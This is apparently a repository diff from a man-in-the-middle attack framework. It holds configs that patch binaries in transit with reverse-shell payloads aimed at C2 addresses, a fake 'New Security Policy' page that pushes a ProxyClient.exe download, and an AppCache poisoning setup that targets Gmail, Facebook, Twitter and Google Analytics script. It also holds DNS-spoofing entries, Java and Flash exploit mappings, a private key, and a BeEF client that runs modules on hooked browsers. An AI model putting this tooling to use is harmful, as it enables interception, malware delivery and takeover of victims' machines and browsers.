PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204
[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194
[FilePwn]
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
[[hosts]]
#whitelist host/IP - patch these only.
#ALL is everything, use the blacklist to leave certain hosts/IPs out
whitelist = ALL
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
blacklist = , # a comma is null do not leave blank
[[keywords]]
#These checks look at the path of a url for keywords
whitelist = ALL
#For blacklist note binaries that you do not want to touch at all
# Also applied in zip files
blacklist = .dll
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 50000000
blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 10000000
blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[[LinuxIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
# PATCH_DLLs as they come across
PATCH_DLL = False
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# XP_MODE - to support XP targets
XP_MODE = True
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = veil_go_payload.exe
MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8088
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = True
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = pentest_x64_payload.exe
MSFPAYLOAD = windows/x64/shell/reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[MachoIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
# Call out the difference for targets here as they differ from ALL
# These settings override the ALL settings
[[[sysinternals.com]]]
LinuxType = None
WindowsType = ALL
CompressedFiles = False
#inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
[[[sourceforge.org]]]
WindowsType = x64
CompressedFiles = False
[[[[WindowsIntelx64]]]]
PATCH_DLL = False
[[[[WindowsIntelx86]]]]
PATCH_DLL = False

View file

@ -1,31 +0,0 @@
<html>
<head>
<title>Website Blocked: ISA Proxy Server</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Proxy Server</b></div>
</center>
</body>
</html>

Binary file not shown.

View file

@ -1,3 +0,0 @@
#!/bin/bash
openssl genrsa -out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"

View file

@ -1,18 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
u0/CRCN/lg==
-----END CERTIFICATE-----

View file

@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
-----END RSA PRIVATE KEY-----

View file

@ -0,0 +1,57 @@
[DEFAULT]
; HTML5 AppCache poisioning attack
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine
enabled=True
tamper_class=libs.AppCachePoisonClass
;all settings below are specific for AppCachePoison
templates_path=config_files/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox
; when visiting first url matching following expression we will embed iframes with all tamper URLs
;(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
; it's only useful to mass poison chrome because:
; - it supports iframe sandbox preventing framebusting
; - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[test]
; any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test ; which templates to use for spoofing content?
skip_in_mass_poison=1
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
[gmail]
tamper_url=http://mail.google.com/mail/
; manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default ; could be omitted
[facebook]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook ; use different template
[twitter]
tamper_url=http://twitter.com/
;tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[testing]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
; we can also modify non-HTML URLs to append malicious code to them
; but for them to be cached in HTML5 AppCache they need to be referred in
; manifest for a poisoned domain
; if not, they are "only" cached for 10 years :D
[ga]
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
;you can add other scripts in additional sections like jQuery etc.

View file

@ -34,5 +34,5 @@
</div>
<div style="padding: 1em;border:1px solid red;margin:1em">
<h1>AppCache Poison works!</h1>
<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
</div>

View file

@ -0,0 +1,2 @@
;console.log('AppCache Poison was here. Google Analytics FTW');

3
config_files/dns.cfg Normal file
View file

@ -0,0 +1,3 @@
#Example config file for dns spoofing
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1

56
config_files/filepwn.cfg Normal file
View file

@ -0,0 +1,56 @@
[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.10.4
PORT = 6666
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.10.4
PORT = 6666
SHELL = iat_reverse_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp

5
config_files/javapwn.cfg Normal file
View file

@ -0,0 +1,5 @@
#Example config file for the javapwn plugin
1.702 = "java_atomicreferencearray"
1.704 = "java_verifier_field_access"
1.706 = "java_jre17_exec"
1.707 = "java_jre17_jaxws"

View file

@ -1,82 +0,0 @@
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
banner2= """
"""
banner3 = """
"""
banner4 = """
"""
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner():
return random.choice([banner1, banner2, banner3, banner4, banner5])

View file

@ -1,367 +0,0 @@
#! /usr/bin/env python2.7
# BeEF-API - A Python API for BeEF (The Browser Exploitation Framework) http://beefproject.com/
# Copyright (c) 2015-2016 Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import requests
import json
from UserList import UserList
class BeefAPI:
def __init__(self, opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "3000"
self.token = None
self.url = "http://{}:{}/api/".format(self.host, self.port)
self.login_url = self.url + "admin/login"
def login(self, username, password):
try:
auth = json.dumps({"username": username, "password": password})
r = requests.post(self.login_url, data=auth)
data = r.json()
if (r.status_code == 200) and (data["success"]):
self.token = data["token"] #Auth token
self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
self.modules_url = "{}modules?token={}".format(self.url, self.token)
self.logs_url = "{}logs?token={}".format(self.url, self.token)
self.are_url = "{}autorun/rule/".format(self.url)
self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
return True
elif r.status_code != 200:
return False
except Exception as e:
print "[BeEF-API] Error logging in to BeEF: {}".format(e)
@property
def hooked_browsers(self):
r = requests.get(self.hooks_url)
return Hooked_Browsers(r.json(), self.url, self.token)
@property
def dns(self):
r = requests.get(self.dns_url)
return DNS(r.json(), self.url, self.token)
@property
def logs(self):
logs = []
r = requests.get(self.logs_url)
for log in r.json()['logs']:
logs.append(Log(log))
return logs
@property
def modules(self):
modules = ModuleList([])
r = requests.get(self.modules_url)
for k,v in r.json().iteritems():
modules.append(Module(v, self.url, self.token))
return modules
@property
def are_rules(self):
return ARE_Rules(self.are_url, self.token)
class ModuleList(UserList):
def __init__(self, mlist):
self.data = mlist
def findbyid(self, m_id):
for m in self.data:
if m_id == m.id:
return m
def findbyname(self, m_name):
pmodules = ModuleList([])
for m in self.data:
if (m.name.lower().find(m_name.lower()) != -1) :
pmodules.append(m)
return pmodules
class SessionList(UserList):
def __init__(self, slist):
self.data = slist
def findbysession(self, session):
for s in self.data:
if s.session == session:
return s
def findbyos(self, os):
res = SessionList([])
for s in self.data:
if (s.os.lower().find(os.lower()) != -1):
res.append(s)
return res
def findbyip(self, ip):
res = SessionList([])
for s in self.data:
if ip == s.ip:
res.append(s)
return res
def findbyid(self, s_id):
for s in self.data:
if s.id == s_id:
return s
def findbybrowser(self, browser):
res = SessionList([])
for s in self.data:
if browser == s.name:
res.append(s)
return res
def findbybrowser_v(self, browser_v):
res = SessionList([])
for s in self.data:
if browser_v == s.version:
res.append(s)
return res
def findbypageuri(self, uri):
res = SessionList([])
for s in self.data:
if uri in s.page_uri:
res.append(s)
return res
def findbydomain(self, domain):
res = SessionList([])
for s in self.data:
if domain in s.domain:
res.append(s)
return res
class ARE_Rule(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
self.modules = json.loads(self.modules)
def trigger(self):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
def delete(self):
r = requests.get('{}/delete/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
class ARE_Rules(object):
def __init__(self, url, token):
self.url = url
self.token = token
def list(self):
rules = []
r = requests.get('{}/list/all?token={}'.format(self.url, self.token))
data = r.json()
if (r.status_code == 200) and (data['success']):
for rule in data['rules']:
rules.append(ARE_Rule(rule, self.url, self.token))
return rules
def add(self, rule_path):
if rule_path.endswith('.json'):
headers = {'Content-Type': 'application/json; charset=UTF-8'}
with open(rule_path, 'r') as rule:
payload = rule.read()
r = requests.post('{}/add?token={}'.format(self.url, self.token), data=payload, headers=headers)
return r.json()
def trigger(self, rule_id):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
def delete(self, rule_id):
r = requests.get('{}/delete/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
class Module(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
@property
def options(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['options']
@property
def description(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['description']
def run(self, session, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}, hb_ids=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids})
r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def results(self, session, cmd_id):
r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token))
return r.json()
class Log(object):
def __init__(self, log_dict):
for k,v in log_dict.iteritems():
setattr(self, k, v)
class DNS_Rule(object):
def __init__(self, rule, url, token):
self.url = url
self.token = token
for k,v in rule.iteritems():
setattr(self, k, v)
def delete(self):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token))
return r.json()
class DNS(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def ruleset(self):
ruleset = []
r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token))
for rule in r.json()['ruleset']:
ruleset.append(DNS_Rule(rule, self.url, self.token))
return ruleset
def add(self, pattern, resource, response=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"pattern": pattern, "resource": resource, "response": response})
r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def delete(self, rule_id):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token))
return r.json()
class Hooked_Browsers(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def online(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['online'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
@property
def offline(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['offline'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
class Session(object):
def __init__(self, session, data, url, token):
self.session = session
self.data = data
self.url = url
self.token = token
self.domain = self.get_property('domain')
self.id = self.get_property('id')
self.ip = self.get_property('ip')
self.name = self.get_property('name') #Browser name
self.os = self.get_property('os')
self.page_uri = self.get_property('page_uri')
self.platform = self.get_property('platform') #Ex. win32
self.port = self.get_property('port')
self.version = self.get_property('version') #Browser version
@property
def details(self):
r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token))
return r.json()
@property
def logs(self):
logs = []
r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token))
for log in r.json()['logs']:
logs.append(Log(log))
return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"hb": self.session, "modules":[options]})
r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def get_property(self, key):
for k,v in self.data['hooked-browsers'].iteritems():
for l,s in v.iteritems():
if self.session == s['session']:
return s[key]

View file

@ -1,44 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import pyinotify
import threading
from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
return ConfigObj("./config/mitmf.conf")
def process_IN_MODIFY(self, event):
self.on_config_change()
def start_config_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/mitmf.conf', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='ConfigWatcher', target=notifier.loop)
